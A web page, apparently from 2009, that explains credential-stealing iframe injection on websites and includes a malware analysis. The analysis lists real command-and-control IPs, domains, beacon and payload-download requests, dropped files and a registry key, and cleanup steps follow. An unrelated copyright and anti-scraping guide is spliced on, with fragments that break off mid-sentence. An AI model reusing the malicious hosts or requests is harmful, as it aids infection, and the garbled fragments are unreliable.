This hacking does not takes place by any PHP application vulnerability nor any kernel bug nor apache bug nor cpanel or Plesk bug. Those accounts files are affected whose FTP logins are leaked.

ONLY THOSE ACCOUNTS ARE HACKED WHOSE FTP LOGIN DETAILS ARE LEAKED AND ARE WITH HACKER !!!!

How it’s done

This is a sophisticated operation, and the infection cycle is involved, but basically, the hacker(s) are setting up innocent looking sites (or using previously hacked sites where the owner is usually unaware of being compromised) and loading them with expensive hacking tools like Mpack. When someone visits that site, their browser is detected and attacked (browsers affected are IE, firefox and opera). The visitor is unaware that they may have a keylogger that sends the persons passwords ect to the hacker(s) and moves on. If the innocent visitor has an ftp or root password for any internet sites, the hackers use a program that goes to the persons site(s) and instantly adds the hidden iframe to every index type page. This is why there seems to be no indication that the site has been compromised, as the hackers already have the ftp or root passwords to login. And since they have at least your account ftp pass, whatever permissions your folders and files are set to make no difference.

After they put the iframe code into that person’s pages, anyone visiting that site will be redirected to the hackers infection site, where the person’s computer will be injected and infected. The hackers are depending on site owners not knowing their sites have been hacked so that the number of hacked sites will grow (as they have starting in Italy) into the tens of thousands… Please don’t think you can depend solely on your antivirus software to protect your computer. It more than likely won’t help you. For $1000 dollars, the russian hacking bulletin boards are offering Mpack with 1 year support and a GUARANTEE that virus programs will not catch the keyloggers. SO, keep your virus program updated, but don’t depend on it completely!

This way this hack is spreading fastly from one computer to another broadcasting the passwords to hackers.During my research in this, I even found some of the password files collected by the hack on some of the hacked server, where they pass this password file to thier tool to add the code. In some cases Google bots picks this files and you can even find the login details of FTP accounts and Server root login details in google.

===============================================
Solution:
===============================================

For Server Administrators:

If you are having this problem server wide then the only possibility is your root password is used for this. Just change the password and this HACK WILL STOP

For individual person owning just a domain and not server:

If you are facing this problem and your administrator says its only your account, just change the FTP password and it will stop

You must have removed the code many times and it comes again, why ???
As you dont change the FTP password. So change that first.

Just changing password is not complete solution but is the first step.
Whats next, your password is leaked that means your computer is sending out the passwords, so I would suggest you to do a clean format first and then install any antivirus of spyware which you think could block it. But the best solution is to clean format the computer.

Just do the two things:

1) Change the FTP or root password of server
2) Clean format the PC

and take care in future, you dont visit any of the virus links made by this hack.
Also to keep your password secure I would suggest you to use any password manager software.

Malicious hidden iframes are mainly inserted in html pages of legit websites by bad hackers that want to spread their malware with the objective to infect all the users that will visit the compromised website and in most of the cases, is possible that the hackers have infected the entire files of the website or they have installed a malicious url redirect to other websites with installed other exploits for common used web browsers.

The website could be compromised by the bad hacker because:
1) You website contains scripts that are vulnerable to RFI/SQL/XSS/LFI/RCE/etc.
2) Your website is hosted in a shared-host and if an hacker has compromise one website hosted in the same cluster where is hosted your website then the hacker can infect ALL the websites present (your included).

Now lets see what would be happened if you had visited the infected website with the hidden malicious iframe.

The malicious hidden iframe looks like:

After I browsed the malicious url I was redirected to another website that contains a PDF Exploit:

Traffic:

GET /in.cgi?cocacola46 HTTP/1.1
Host: litetopfindworld.cn
HTTP/1.1 302 Found

GET /index.php?cocacola46 HTTP/1.1
Host: ghrgt.hostindianet.com
HTTP/1.1 200 OK
Server: nginx/0.6.35
Content-Length: 6147

Below there is the exploit screenshot:

We can see that the exploit redirected my browser to:

cache/readme.pdf => Another iframe redirect
cache/flash.swf => Another iframe redirect

Were created various files in Temporary Internet Files related to the malicious urls:

After the execution of the files downloaded from the exploit, new files were created in my system:

C:\WINDOWS\system32\wbem\grpconv.exe
C:\WINDOWS\Temp\wpv331238107706.exe
C:\WINDOWS\Temp\wpv761238313566.exe
C:\WINDOWS\system32\crypts.dll
C:\Documents and Settings\user\user.exe

The file C:\Documents and Settings\user\user.exe had +H (Hidden) attribute and was hidden from explorer search.

The DLL file named crypts.dll was injected in explorer.exe and the file named user.exe created a new registry key to be able to startup everytime windows start:

HKCU\…\Run\user.exe

During the analysis, the malware established various connections with different domains and IPs:

94.247.3.152 (hs.3-152.zlkon.lv)
213.155.4.82 (N/A)
78.109.30.224 (reverse30-224.reserver.ru)
94.247.2.95 (hs.2-95.zlkon.lv)
68.180.151.74 (hansali4.com)
83.133.127.5 (.)

Traffic:

GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=xxx&rnd=xxx HTTP/1.1
Host: 213.155.4.82

POST /good/receiver/online HTTP/1.1
Host: 78.109.30.224
Content-Length: 16
guid=xxxxxx

GET /bt.php?mod=&id=xxx&up=xxx&mid=soboc42 HTTP/1.1
Host: af9f330a59.com
0SLP:3600;MOD:dAcbf6;URL:hxxp://hansali4.com/731l2.exe;SRV:stoped;

GET /731l2.exe HTTP/1.1
Host: hansali4.com

POST /gate/gate.php HTTP/1.0
Host: mixmediadirect.cn

194.8.74.51:443 => SSL Traffic

At the end, the malware started to establish connections with hotmail.com probably for spam messages to other emails or something similar:

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: hotmail.com
Connection: Keep-Alive

HTTP/1.1 302 Redirected
Date: Sun, 29 Mar 2009 16:59:07 GMT
Server: Microsoft-IIS/6.0
Location: hxxp://lc1.bay0.hotmail.passport.com/cgi-bin/login

Report from the virus scanner:

Report Generated: 29.3.2009 at 19.57.41 (GMT 1)
Time for scan: 50 seconds
File Name: index[1].htm
File Size: 6 KB
MD5 Hash: 2F9467513FAE3071B8EC831857963340
SHA1 Hash: 59C6D7D70F529762FAD7408360E016D6C816EFB3
Detection Rate: 2 on 24 (8,33 %)
Status: INFECTED
Antivirus Sig version Engine Version Result
a-squared 29/03/2009 4.0.0.32 -
Avira AntiVir 7.1.2.228 8.1.2.12 -
Avast 090328-0 4.8.1229 -
AVG 270.11.31/2028 8.0.0.0 -
BitDefender 29/03/2009 7.0.0.2555 -
ClamAV 29/03/2009 0.93.1.0 -
Comodo 1087 3.8 -
Dr.Web 29/03/2009 5.0 -
Ewido 29/03/2009 4.0.0.2 -
F-PROT 6 20090328 4.4.4.56 JS/Psyme.IX
G DATA 19.3655 2.0.7309.847 -
IkarusT3 27/03/2009 1001044 -
Kaspersky 29/03/2009 8.0.0.357 Trojan-Downloader.JS.Agent.duy
McAfee 29/03/2009 5.1.0.0 -
Malware Hash Registry 29/03/2009 N/A -
NOD32 v3 3972 3.0.677 -
Norman 2009/03/27 5.92.08 -
Panda 07/02/2009 9.5.1.00 -
QuickHeal 28 March, 2009 10.0 -
Solo Antivirus 29/03/2009 8.0 -
Sophos 29/03/2009 4.32.0 -
TrendMicro 927(592700) 1.1-1001 -
VBA32 29/03/2009 3.12.0.300 -
VirusBuster 10.102.26 1.4.3 -

Report Generated: 29.3.2009 at 19.56.42 (GMT 1)
Time for scan: 46 seconds
File Name: 731l2[1].exe
File Size: 71 KB
MD5 Hash: 6E14662D9469DFC1E6387F9C5D00513A
SHA1 Hash: C0E8B584E105ACED2A4CE403EF77CB45B3987E45
Detection Rate: 17 on 24 (70,83 %)
Status: INFECTED
Antivirus Sig version Engine Version Result
a-squared 29/03/2009 4.0.0.32 -
Avira AntiVir 7.1.2.228 8.1.2.12 TR/Downloader.Gen
Avast 090328-0 4.8.1229 Win32:Trojan-gen {Other}
AVG 270.11.31/2028 8.0.0.0 Downloader.Generic8.ZVT
BitDefender 29/03/2009 7.0.0.2555 Trojan.Generic.1545891
ClamAV 29/03/2009 0.93.1.0 -
Comodo 1087 3.8 Backdoor.Win32.KeyStart.~A
Dr.Web 29/03/2009 5.0 Trojan.DownLoader.origin
Ewido 29/03/2009 4.0.0.2 -
F-PROT 6 20090328 4.4.4.56 -
G DATA 19.3655 2.0.7309.847 -
IkarusT3 27/03/2009 1001044 Backdoor.Win32.KeyStart
Kaspersky 29/03/2009 8.0.0.357 Backdoor.Win32.KeyStart.cb
McAfee 29/03/2009 5.1.0.0 Generic Downloader.x trojan
Malware Hash Registry 29/03/2009 N/A detect rate 74%
NOD32 v3 3972 3.0.677 Win32/TrojanDownloader.Agent.OWB
Norman 2009/03/27 5.92.08 Trojan W32/DLoader.KZPW
Panda 07/02/2009 9.5.1.00 -
QuickHeal 28 March, 2009 10.0 Backdoor.KeyStart.cb
Solo Antivirus 29/03/2009 8.0 Backdoor.Win32.KeyStart.CB
Sophos 29/03/2009 4.32.0 Sus/Spy-B
TrendMicro 927(592700) 1.1-1001 -
VBA32 29/03/2009 3.12.0.300 Backdoor.Win32.KeyStart.bz
VirusBuster 10.102.26 1.4.3 Backdoor.KeyStart.AD

What to do to remove the infection ?

Step 1: Clean the html pages

The first action that the system administrator needs to do is to remove from the HTML pages the malicious hidden iframe code and then check the logs and the code of installed php scripts to find the presence of possible vulnerable code.

Step 2: Remove the infected files

To remove the infected files from your system you need to:

1) Delete all created files, in my case:

C:\WINDOWS\system32\wbem\grpconv.exe
C:\WINDOWS\Temp\wpv331238107706.exe
C:\WINDOWS\Temp\wpv761238313566.exe
C:\WINDOWS\system32\crypts.dll
C:\Documents and Settings\user\user.exe

2) Delete the malicious registry key, in my case:

HKCU\…\Run\user.exe

3) Do a complete system scan with your Antivirus to detect other possible viruses installed in your computer.

4) Download, install and update NVT Malware Remover Tool and do a complete system scan of your computer.

Criminals are getting better at this kind of work. They have built very successful automated tools that poke and prod web sites, looking for programming errors and then exploit these flaws to install the drive-by download software. Often this code opens an invisible iFrame page on the victim’s browser that redirects it to a malicious

Following are some tips to get rid of this hackers or hijackers activity.

- Keep you password and username safe change it frequently only with strong password check your password with Microsoft

- Keep your PC clean from

- Keep all folders and files permissions proper in your

- There are many techniques used to hack/hijack the website

Cross Site Scripting (XSS)

SQL injection flaws

Site reconnaissance

Session hijacking

Application denial of service

Cookie/session tampering

To withstand from this you need “professionally well designed websites” and also powerful

- You need to choose good

- But not the least the best way to find the flow in website is by checking the

- If some one reports your site having virus then its 99% sure your site home pages are having masked IFrames at the beginning or last lines of the page, which actually downloads virus file form some other server/site. You can fix it your self by editing your home page and removing the contents which looks like as shown bellow.

The Google Quality Guidelines for Webmasters clearly states “Don’t create multiple pages, subdomains, or domains with substantially duplicate content.” Search engine rankings can fall because your content has been duplicated, either by someone stealing your content, or you having duplicate web sites. If your web site has exclusive content, then other sites can only link to your web site. External links pointing to a single web site with exclusive content will have a higher search engine ranking than the same number of links pointing to many sites with stolen or duplicated web content. Some SEOs believe Google penalizes Page Rank when it finds duplicate content. The Duplicate Content Penalty can mean the removal of your web site from the search engine index (delisting), and lower the overall rank of your web pages. If stolen web content is indexed first, the site with the original web content can be penalized with a lower ranking, or omitted from the search results. Obviously, this can affect revenue for business sites.
Copyright Notice:

In many countries, including the US, UK, and EU, your web site and web content is protected without an official copyright notice. However, other nations require the official copyright notice. Some nations also require the notice “All Rights Reserved.” Including the official complete copyright notice with the optional “All Rights Reserved” notice on all web pages offers limited protection in countries that accepted the international copyright treaties.

* Display the universally accepted copyright symbol © © with the date and your name on your html pages.© 2007 www.wiscocomputing.com
* Use the copyright metatag on your html pages.
* Comments can be added to your code with your copyright message. <!– Copyright 2007 WISCO Computing –>

Copyright Registration:

In the UK, http://www.copyrightservice.co.uk keeps an independent record of your copyrighted material.

In the United States, if you are serious about protecting your hard work you’ll need to register your web site copyright with the U.S. Copyright Office. Complete information for copyrighting your web site is available at http://www.copyright.gov/circs/circ66.pdf.

Your web site is a published literary work. Your application must contain two deposits of your web site. You have a choice to include representative web pages or paper copies of every page of your web site. You can also include the entire web site on a cd-rom or other electronic format. Obviously, if you include every page of your web site, you have the best proof that plagiarism occurred. If you only registered a representative sample, it will be much harder to prove plagiarism occurred.

You can not file a lawsuit for copyright infringement unless you first obtain a Certificate of Registration or a denial of Registration from the Copyright Office. The copyright will become effective the date the deposit and application is received by the Copyright Office, not the date they complete processing your application (could be months after the received date).

If your copyright is registered before an infringement occurs, you can recover attorneys’ fees and statutory damages. With the ability to claim statuatory damages, you do not have to prove lost profits or the infringer’s profits because the court can award up to $30,000 for each infringed copyrighted work. Statutory damages of up to $150,000 plus attorney fees can be awarded if the infringement was willful.

If your web site or literary work was not registered before the infringement occurred, you can not obtain statutory damages or attorneys’ fees. You still have the right to obtain an injunction, damages for your lost profits, and the infringer’s profits.

Obtaining a Certificate of Registration for your web site will allow you to recover statutory damages and attorneys’ fees if future infringements occur. You can obtain a certified copy of your deposit from the Copyright office if it is needed for litigation. Most of the time, your deposit copy, with your Certificate of Registration issued by the Copyright Office is sufficient for litigation.

Protecting Your Pages:

Check to make sure the permissions on your site folders are set correctly. Occasionally check your log files for any attempted hacks.
robots.txt File:

Well-behaved spiders should follow the instructions in your robots.txt file. Banning specific web robots from your web site can reduce your website bandwidth. Log files can be used to identify the different robots that visit your site. If a robot is doing something on your web site that you do not like, or is from a country that you prefer not to index your site, you can ban those robots. Information about known bots is available at http://www.jafsoft.com/searchengines/webbots.html and http://www.robotstxt.org/wc/active.html. If some content does get into a spidered index by accident, you can request that it be removed.
.htaccess file:

Some countries have deserved reputations for fraud and content theft. Your software may have absolutely no sales potential in some countries. It makes no sense to waste your bandwidth, and make it easier for visitors from those countries to steal your content. You may also want to ban visitors that are referred from rogue web sites that list cracks and serial numbers.

Web servers follow your instructions placed in .htaccess files. .htaccess files can be placed in any directory on your web site. The .htaccess file can be used to password protect folders, ban specific web robots, ban visitors with specific IP addresses and countries, allow users with specific IP addresses, stop directory listings, ban specific download software, and redirect visitors to other web pages and web sites.

An .htaccess file placed in your image directory can prevent images from being displayed on a different site. This is called hot linking, and uses your bandwidth. A text line can be included to display an alternate image not located in the protected image directory. Or you could replace your stolen web content with a different image indicating the theft.
HTML Meta Tags:

The following example placed in the  portion of an HTML web page instructs all web robots to not index or analyze the web page for links:
. Not all robots understand this HTML tag.

This code placed in the  portion of an HTML web page stops well-behaved web bots from archiving your content:

Images larger than 200 by 200 display an image toolbar allowing the visitor to save the image (IE 6 and greater). Add this code to the  section of your page to disable the image toolbar (.htaccess can also be used). The image could still be stolen by using screen-capture software.

For all images use:

For individual images use: <img src=”mypicture.jpg” alt=”" />
Use Absolute Links for HTML Pages:

An absolute link is the complete URL, for example http://www.yourdomain.com/folder/page.htm. If you use relative links, it is very easy for a plagiarist to copy your web site or individual web pages to a new domain. Absolute links would require the plagiarist to work harder to remove or change all of your absolute links. Remember, a plagiarist is lazy. If the plagiarist fails to change or remove all of your links, your web stats could alert you to your stolen web content.

Using absolute links does require more work on your part, but there is another benefit. Sometimes search engines index your site using yourdomain.com instead of www.yourdomain.com, resulting in fewer internal links. A loss of internal links will likely cause your search engine ranking to drop. Since external site links always use www.yourdomain.com, it makes sense to also use absolute internal links to keep your total link count high.
Naming Files and Folders:

Avoid obvious folder names like secret, personal, private, and protected. Avoid obvious file names like customerorders.txt and creditcardnumbers.txt. Automated hacking tools look for common names. If you have confidential information on the web server, make sure it is encrypted. If you have some images, consider using the ALT tags to add common mispellings to your web pages. It can help your SEO, and help idetify your stolen web content. If the thief performs any search and replace, it is more probable that the thief will miss that misspelled text.
Index.htm:

Put a file called “index.htm” or “index.html” in every directory on your web site. This prevents thieves from viewing other files located in the same directory. Htaccess can also be used to prevent the directory listing. Do not use obvious names for your confidential password, email, and order directories and filenames.
Using PHP:

When you install a new CMS (Content Management System) or bulletin board system like phpBB, change every default setting you can. With PHP, set display_errors to 0. Error messages give too many clues to hackers. If you use PHP, the Register Globals directive should be turned off. Why? If Register Globals is enabled, then adding ?authorized=1 to the query will let an attacker break in.
Passwords:

A web-site can be password protected by both Javascript and .htaccess If you are protecting one area of your site, validate the user’s login credentials every time. Cookies and input forms are too easy to forge. Htaccess information is available at www.javascript.com/howto/htacess.shtml .htaccess is more secure than Javascript
Data Input:

Make sure all data input that isn’t validated is deleted immediately. Even information in a cookie can be manipulated by a hacker. Form data should be submitted as part of a POST, not GET, and use no cache tags. The user’s information will not be displayed when the back button is pressed on the browser.
Scripts:

Check scripts you use on your web site for security holes. Enter your script name and the word ’security’ into search engines to try to find fixes or alternative safe scripts. Rename common scripts before installing them. Check regularly for updates and patches. Many scripts have a lot of extra features you do not need. Either remove or turn off those extra features. Use the administration section to change file permissions as necessary.
Disable Right-Click:

Javascript can be used to disable the mouse right-click. Selections on the pop-up menu can be used to view your source code and save your images. Disabling the right-click – although not effective, reminds the thief that you own the site’s copyright. However, disabling the right-click also disables other menu choices like add to favorites. Smart users can still use the View Source to see what you’ve done, or enter javascript:void(document.contextmenu=null) in the address bar to break your protection. Thieves can browse their cache to get your images and use an offline browse to download your web pages. Thieves can use a screen capture program to save your images.

The following script disables the mouse right-click.
<script type=”text/javascript”><!–
document.oncontextmenu=function() { return false; }
// –></script>
HTML Compression:

An HTML compression program removes line returns from your HTML code. A free version of HTML Shrinker is available at www.thepluginsite.com/products/htmlshrinker/
HTML Encryption:

The HTML page is scrambled with a script added at the beginning to unscramble the code so the browser can display the content. View source will only show the scrambled version. However, search engines will not able to read your scrambled version either. CGIScript at www.scriptsearch.com disables right-clicking and encrypts your code so that it can’t be saved from a browser or viewed.

Use www.dynamicdrive.com/dynamicindex9/encrypter.htm to paste a section of your HTML code, encrypt it, and copy it back to your HTML editor.

CSS Options:

To prevent printing insert these commands in the main stylesheet:
media print{
body {display:none;}
}

To prevent text from being selected, the text can be placed inside

tags
<div style=”-moz-user-select: none;”>Text that can not be selected.</div>
Place a CSS layer over the top of an image. When the visitor right-clicks on the image, they’ll actually be clicking on the layer instead of the image.

To disable the clipboard, add the following code inside the tags:
onload=setinterval(”window.clipboarddata.cleardata ()”, 20)

The disabled clipboard remains active until that browser window is closed, affecting other programs.
Using Frames:

Place your site in an invisible frame. Create a frameset for your main page with no-right click and menubar free with this code:

Image Protection:

Convert your images to flash movies. However, a flash decompiler can decrypt your flash applets. Flash applets can check their serving location. Check the serving location at random times. Google indexes SWF files.

Secure Image from Artistscope is a Java based application that encrypts your images so they can only be served from a specified URL. Since the images are part of the application, traditional methods of stealing your images will not work. www.artistscope.net/secure_image/

Photographers, Artists, and Illustrators – don’t include links to the high resolution versions of your work. If you do, make sure your watermark is clearly displayed.

Split your images into pieces, with the browser reassembling to display the original image.

Paint Shop Pro and Photoshop can use a Digimarc plugin. Personal information about the author can be added to the image file. This information can be read by any DIgimarc enabled imaging program to prove you are the creator. A basic subscription costs $79.00 for one year with the ability to watermark up to 1000 images.
Watermarks:

Add watermarks or text captions to your images. A watermark can be added directly to a copy of the image or the watermark can be saved with a transparent background for a layer.
<div style=”position: absolute; left: 10px; top: 15px; width: 210px; height: 210px; background-image: url(mypicture.jpg);”><img src=”watermark.gif” alt=”" width=”210″ height=”210″ /></div>